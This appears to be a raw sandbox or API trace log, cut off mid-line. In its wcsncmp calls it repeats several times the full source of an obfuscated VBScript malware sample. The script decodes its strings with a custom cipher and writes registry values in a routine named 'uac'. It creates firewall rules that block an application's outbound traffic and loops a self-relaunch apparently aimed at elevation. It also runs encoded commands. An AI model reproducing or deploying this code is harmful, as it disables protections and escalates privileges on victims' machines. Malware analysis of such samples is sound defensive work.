bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 94 [0222.922] wcsncmp (_String1="ey\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.922] wcsncmp (_String1="y\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108 [0222.922] wcsncmp (_String1="\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0222.923] wcsncmp (_String1="\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 